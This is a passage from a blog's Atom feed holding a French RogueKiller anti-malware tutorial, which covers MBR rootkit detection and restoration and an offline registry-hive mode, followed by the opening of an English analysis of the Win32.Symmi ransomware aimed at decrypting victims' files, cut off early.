&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Voici un autre exemple de rapport&lt;span style="font-size: small;"&gt; présen&lt;span style="font-size: small;"&gt;tant un MBR infecté. Le boots&lt;span style="font-size: small;"&gt;rap (BSP) est &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;infecté avec le rootkit MaxSST.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Check: ¤¤¤&lt;br /&gt;&lt;br /&gt;
+++++ PhysicalDrive0: ST9500325AS +++++&lt;/span&gt;
&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;
--- User ---&lt;br /&gt;
[MBR] 318e94ac5cf893f8e2ed0643494e74&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;0e&lt;br /&gt;
[BSP] 07a9005ccf77d28c668138e4d4a42d&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;65 : &lt;b&gt;&lt;span style="color: #cc0000;"&gt;MaxSS MBR Code!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Partition table:&lt;br /&gt;
0 - [XXXXXX] FAT32-LBA (0x1c) [HIDDEN!] Offset (sectors): 2048 | Size: 13000 Mo&lt;br /&gt;
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 26626048 | Size: 119235 Mo&lt;br /&gt;
2 - [XXXXXX] EXTEN-LBA (0x0f) [VISIBLE] Offset (sectors): 270819328 | Size: 344703 Mo&lt;br /&gt;
User = LL1 ... OK!&lt;br /&gt;
User = LL2 ... OK!&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Il &lt;span style="font-size: small;"&gt;est possible de &lt;b&gt;désactiver le scan &lt;span style="font-size: small;"&gt;MBR&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; avant d'&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;effectuer le scan&lt;/b&gt; en décochant la case &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;MBR&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-oucLEAIveFo/UJPgjljLzxI/AAAAAAAAAR4/VES3v2eTie4/s1600/Capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="478" src="http://1.bp.blogspot.com/-oucLEAIveFo/UJPgjljLzxI/AAAAAAAAAR4/VES3v2eTie4/s640/Capture4.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;En cas d'infection MBR, il est possible de res&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;tau&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rer le MBR&lt;/b&gt;&lt;span style="font-size: small;"&gt;. &lt;span style="font-size: small;"&gt;Sel&lt;span style="font-size: small;"&gt;on le cas de &lt;span style="font-size: small;"&gt;figure&lt;/span&gt;, cela peut se passer &lt;span style="font-size: small;"&gt;différemment&lt;/span&gt;.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;span style="font-size: small;"&gt;Si le MBR est masqué (&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;User != LL&lt;span style="font-size: small;"&gt;x&lt;/span&gt; ... KO!) , &lt;b&gt;alors on peut récupérer le MBR original et &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;le fixer de manière automatique&lt;/b&gt;. &lt;span style="font-size: small;"&gt;Il suffit de choisir l'index &lt;span style="font-size: small;"&gt;correspondant dans &lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;PhysicalDrive&lt;/i&gt;&lt;/b&gt;, et de cliquer sur &lt;i&gt;&lt;b&gt;MBR RAZ&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span id="goog_987699446"&gt;&lt;/span&gt;&lt;span id="goog_987699447"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-GW6OgNobtbA/UJPilaPaPfI/AAAAAAAAASA/udp83qnPU5M/s1600/mbr1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="63" src="http://3.bp.blogspot.com/-GW6OgNobtbA/UJPilaPaPfI/AAAAAAAAASA/udp83qnPU5M/s400/mbr1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;Si l&lt;span style="font-size: small;"&gt;e MBR a été écrasé, il n'existe pas de copie de sauvegard&lt;span style="font-size: small;"&gt;e. &lt;b&gt;On peut al&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ors restaurer un MBR par défaut&lt;/b&gt;, dont le choix est fait &lt;span style="font-size: small;"&gt;dans &lt;span style="font-size: small;"&gt;une liste de système d'exploita&lt;span style="font-size: small;"&gt;tion (&lt;b&gt;Windows XP, Vista, Seven&lt;/b&gt;).&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Il suffit de choisir l'index &lt;span style="font-size: small;"&gt;correspondant dans &lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;PhysicalDrive&lt;/i&gt;&lt;/b&gt;, de choisir le système d'&lt;span style="font-size: small;"&gt;exploitation de &lt;span style="font-size: small;"&gt;l’ordinateu&lt;span style="font-size: small;"&gt;r&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;et de cliquer sur &lt;i&gt;&lt;b&gt;MBR RAZ&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-3jJ6_n6YnZc/UJPimHYvpBI/AAAAAAAAASE/oDuGkn4BUhM/s1600/mbr2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="61" src="http://4.bp.blogspot.com/-3jJ6_n6YnZc/UJPimHYvpBI/AAAAAAAAASE/oDuGkn4BUhM/s400/mbr2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: large;"&gt;R&lt;span style="font-size: large;"&gt;OGUEKILLER PE&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: small;"&gt;Depuis peu, RogueKiller est capable de lire les &lt;a href="http://forum.malekal.com/les-ruches-registre-windows-t36726.html"&gt;ruc&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://forum.malekal.com/les-ruches-registre-windows-t36726.html"&gt;hes &lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://forum.malekal.com/les-ruches-registre-windows-t36726.html"&gt;Windows&lt;/a&gt; en mode &lt;i&gt;&lt;b&gt;Offline&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. Cela veut dire que RogueKiller est capable de:&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;b&gt;Détecter les clés de registre cachées&lt;/b&gt; de l'API (rootkit)&lt;/li&gt;
&lt;li&gt;Détecter et supprimer les clés de registre d'un système d'exploitation présent sur un &lt;b&gt;disque externe&lt;/b&gt;.&lt;/li&gt;
&lt;li&gt;Détecter et supprimer les clés de registre d'un PC &lt;b&gt;lancé depuis un live CD PE&lt;/b&gt; (ex: OTLPE)&lt;/li&gt;
&lt;/ol&gt;
Concrètement, cela est pratique dans le cas de rootkits masquant/protégant leurs clés de registre, ou lorsqu'un PC est inaccessible en raison d'un malware bloquant toute les actions (ransomwares).&lt;br /&gt;
&lt;br /&gt;
Voici une démonstration du mode PE effectuée sur un PC infecté par le malware &lt;i&gt;&lt;b&gt;Gendarmerie&lt;/b&gt;&lt;/i&gt;, et lancé depuis un live CD OTLPE:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/w55mDdgyk_s/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/wvU_DdHXrns" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/3064105795964356585/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/10/fr-roguekiller-tutoriel-officiel.html#comment-form" title="11 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3064105795964356585?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3064105795964356585?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/wvU_DdHXrns/fr-roguekiller-tutoriel-officiel.html" title="[FR] RogueKiller tutoriel officiel" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s72-c/Capture.PNG" height="72" width="72" /><thr:total>11</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/10/fr-roguekiller-tutoriel-officiel.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0UDSHw4fyp7ImA9WhJaFUs.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-167182860734703640</id><published>2012-10-06T17:19:00.001-07:00</published><updated>2012-10-06T17:21:19.237-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-06T17:21:19.237-07:00</app:edited><title>[Analysis] Win32.Symmi naked - Decryption</title><content type="html">&lt;h2 style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Analysis of Win32.Symmi&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Find the key and decrypt the files&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s1600/Pr%C3%A9sentation1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Recently on Malekal.com's forum, I came across a challenge.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Some people got infected by a brand new ransomware having the particularity to encrypt documents (based on extension, .jpg, .doc, and so on). Having a dropper, I decided to have a look into it and find a way to decrypt those files (if possible)...&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
The dropper is detected as &lt;b&gt;Win32.Symmi&lt;/b&gt; on Virus Total:&lt;br /&gt;
&lt;a href="https://www.virustotal.com/file/2aca300b45371b3e01e1ab044798bc6777e11345435713027bc8cae6292dda0f/analysis/"&gt;https://www.virustotal.com/file/2aca300b45371b3e01e1ab044798bc6777e11345435713027bc8cae6292dda0f/analysis/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Static analysis - What has changed on files?&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
After launched the dropper, I looked at the modified files.&amp;nbsp; After a little wait, the infection showed up a window saying lots of documents where compromised. The infection is self restarted by a registry key (RUN).&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
